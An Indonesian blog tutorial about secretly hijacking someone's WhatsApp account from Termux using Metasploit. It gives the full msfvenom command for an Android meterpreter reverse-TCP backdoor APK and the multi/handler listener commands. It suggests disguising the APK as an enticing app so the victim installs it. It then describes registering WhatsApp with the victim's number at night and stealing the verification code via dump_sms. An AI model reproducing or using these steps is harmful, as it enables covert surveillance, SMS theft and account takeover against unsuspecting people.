Cara Sadap WhatsApp dengan Termux Metasploit 2022

Cara Sadap WhatsApp dengan Termux Metasploit
Cara Sadap WhatsApp dengan Termux Metasploit - Cara sadap WhatsApp Termux adalah tutorial untuk melihat isi chat WhatsApp orang lain dari jarak jauh.

Untuk melakukan hal tersebut, kita akan menggunakan aplikasi Termux dan tools yang bernama Metasploit.

Cara kerjanya yaitu dengan menjalankan Metasploit dari aplikasi Termux, setelah itu memasukkan perintah untuk membuat aplikasi hack WhatsApp.

Kemudian aplikasi tersebut harus dikirim ke target, dengan begitu kita bisa dengan bebas menyadap WhatsApp korban, cara ini disebut dengan teknik backdoor atau playload.

Playload ini tidak hanya untuk sadap WhatsApp, tetapi bisa juga digunakan untuk mengontrol android dari jarak jauh.

Karena sekarang kita belajar cara sadap WhatsApp dengan Termux Metasploit, maka kami akan membahas bagian yang terkait dengan pembahasan tersebut.


Cara Sadap WhatsApp dengan Termux Metasploit


1. Cara Sadap WhatsApp dengan Termux Metasploit

Cara Sadap WhatsApp dengan Termux Metasploit
Cara Sadap WhatsApp dengan Termux Metasploit
Cara sadap WhatsApp dengan termux Metasploit ini berbeda dengan WhatsApp web yang akan muncul notif di HP korban, sedangkan dengan Termux Metasploit tidak akan muncul notif apapun di HP korban.

Sehingga anda tidak akan ketahuan telah melakukan pembajakan WhatsApp korban, hal pertama yang harus anda lakukan yaitu menginstall tools metasploit di aplikasi termux.

lalu anda membuat nama hack WhatsApp dengan nama aplikasi backdoor.apk dari Metasploit, dengan aplikasi ini akan menjadi perantara antara HP korban dengan tools Metasploit yang sedang dijalankan.

Ketika backdoor sudah terhubung anda tinggal memasukkan perintah dari Metasploit untuk mendapatkan chat WhatsApp korban.



2. Cara Sadap WhatsApp dengan Termux Metasploit Via Backdoor

Cara Sadap WhatsApp dengan Termux Metasploit
 Cara Sadap WhatsApp dengan Termux Metasploit Via Backdoor
Agar lebih jelasnya cara sadap WhatsApp dengan termux Metasploit via backdoor, simaklah penjelasan di bawah ini.


a. Jalankan Tools Metasploit

Anda pastikan bahwa sudah menginstall Metasploit dengan benar, kemudian anda ketik perintah berikut di tampilan awal aplikasi Termux Metasploit.

Anda tunggu loading sampai Metasploit bisa dilaunch, maka akan ada tanda jika anda sudah masuk ke tools Metasploit ini.

Biasanya di atas kode Metasploit terdapat logo (ASCII) yang berubah-ubah, yang muncul terkadang sapi, tengkorak, tank baca, dan alain-lainnya.

Jadi, ketika anda menjalankan Metasploit kemudian mendapatkan logo yang berbeda-beda, maka jangan anda permasalahkan.



b. Buat Aplikasi Hack WhatsApp

Untuk membuat nama aplikasi anda bisa mengatur sendiri, tetapi membuat nama hack WhatsApp sebaiknya dengan nama aplikasi backdoor agar anda mudah untuk menjelaskannya.

Untuk tampilan awal metasploit, anda masukkan perintah berikut msfvenom -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -o /sdcard/backdoor.apk.

Maksud penulisan di atas ialah:
  • Ganti LHOST dengan alamat IP anda.
  • Backdoor.apk adalah nama aplikasi, silahkan anda ganti dengan nama pilihan anda (hsrus diakhiri dengan .apk)
  • Di atas 1 baris perintah, itu artinya jangan menekan enter sebelum kata terakhir (/sdcard/namaAplikasi.apk).
  • Rekomendasi dari kami, anda ganti nama aplikasi menjadi nama yang membuat orang lain ingin menginstallnya, misalnya s*m*ntok.apk (shoope pink), hack pulsa.apk, dan lain-lainnya.
  • Tujuannya diubah adalah agar target tertarik untuk menginstall aplikasi backdoor tersebut, karena jika sudah di install baru anda bisa melakukan proses selanjutnya.

Jika proses pembuatan aplikasi berhasil, maka akan muncul di layar Termux notif seperti ini:saved as: /sdcard/backdoor.apk.

Anda cek di penyimpanan internal android, anda pastikan ada file yang bernama backdoor.apk atau nama yang anda tulis sebelumnya.

Tetapi, apabila proses pembuatan aplikasi gagal, anda periksa dulu perizinan aplikasi Termux di pengaturan HP, anda pastikan ada izin untuk mengakses penyimpanan.

Lalu anda ulangi lagi proses pembuatan seperti yang telah dijelaskan di atas.


c. Hubungkan Aplikasi yang baru Dibuat dengan Metasploit

Agar aplikasi bisa dihubungkan maka anda harus melakukan syarat utamanya yaitu harus menginstall aplikasi tersebut di android target sadap WhatsApp.

Jadi anda harus mengirimkan file .apk kepada orang yang ingin anda sadap atau menginstall di HP sendiri dulu untuk percobaan.

Kemudian anda kembali lagi ke tools Metasploit dan masukkan perintah berikut yaitu use multi/handler . set payload android/meterpreter/reverse_tcp . set lhost ip anda . set lport 4444 . exploid.

Di atas tersebut adalah 5 baris perintah, anda tekan enter setiap selesai menuliskan 1 baris perintah, anda tunggu proses menghubungkan antara aplikasi dengan Metasploit.

Jika sudah terhubung maka akan muncul "meterpreter>".

Terkadang proses menghubungkan ini bisa gagal, maka solusinya saat aplikasi sudah terinstall di HP target, cepatlah anda masukkan perintah use multi/handler di atas dan koneksi internet tetap terhubung.



d. Mendaftar Akun WhatsApp Menggunakan Nomor Target

Selanjutnya silahkan anda membuat akun WhatsApp dengan nomor HP target, saat apk hack WhatsApp sudah terhubung, maka semua notifikasi di HP target biasa anda ketahui.

Dengan mendaftar WhatsApp anda menggunakan nomor HP target, secara otomatis pasti anda membutuhkan kode verifikasi WhatsApp yang dikirim ke nomor target.

Kode verifikasi WhatsApp bisa anda ketahui di langkah nomor 5, sekarang anda silahkan untuk meyelesaikan pendaftaran akun WhatsApp sampai proses memasukkan kode verifikasi.

Anda sebaiknya melakukan trik ini di malam hari atau saat target tidak memainkan HP, karena target nantinya bisa curiga jika ada sms masuk tentang kode verifikasi WhatsApp.

e. Mengambil Kode Verifikasi WhatsApp dari Dump SMS


Cara mengambil kode verifikasi WhatsApp dari dump sms yaitu sebagai berikut:
  • Terlebih dahulu anda kembali lagi ke aplikasi Termux yang sedang menampilkan meterpreter.
  • Lalu anda masukkan kode berikut untuk mendapatkan kode verifikasi WhatsApp korban:dump_sms.
  • Kemudian akan muncul nama file barakhiran .txt (file dump sms Metasploit).
  • Anda copy nama file tersebut, lalu pergi ke new season Termux, dengan cara usap dari kiri ke kanan dan pilih new season.
  • Selanjutnya anda masukkan perintah berikut ini:nano namafile.txt contoh : nano sms_dump_121374564848.txt.
  • Jika tidak bisa, anda coba masukkan dulu perintah pkg install nano -y untuk menginstall nano editor, saat file .txt terbuka, anda kan mendapatkan semua sms dari HP korban.
  • Anda cari saja pesan yang berisi kode verifikasi WhatsApp, jika sudah anda temukan, maka copy kode verifikasinya dan masukkan di pendaftaran WhatsApp anda yang terhenti sebelumnya.
  • Selesai.

Maka anda pun sudah berhasil menghack akun WhatsApp target.



Akhir Kata

Dengan pembahasan di atas anda bisa melakukan cara menyadap WhatsApp yang ingin anda sadap, akan tetapi janganlah sampai merugikan target yang ingin anda sadap.

Beritahukan kepada teman anda sekilas informasi tentang cara menyadap WhatsApp orang lain dengan Termux Metasploit.

Semoga dengan pembahasan di atas dapat bermanfaat dan menambah wawasan anda tentang cara menyadap WhatsApp orang lain.

Cukup sekian pembahasan artikel tentang cara sadap WhatsApp dengan termux metasploit, selamat mencoba.
Dody S. Praktisi teknologi, editor dan jurnalis di 1001Media.

Tidak ada komentar:

Posting Komentar

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel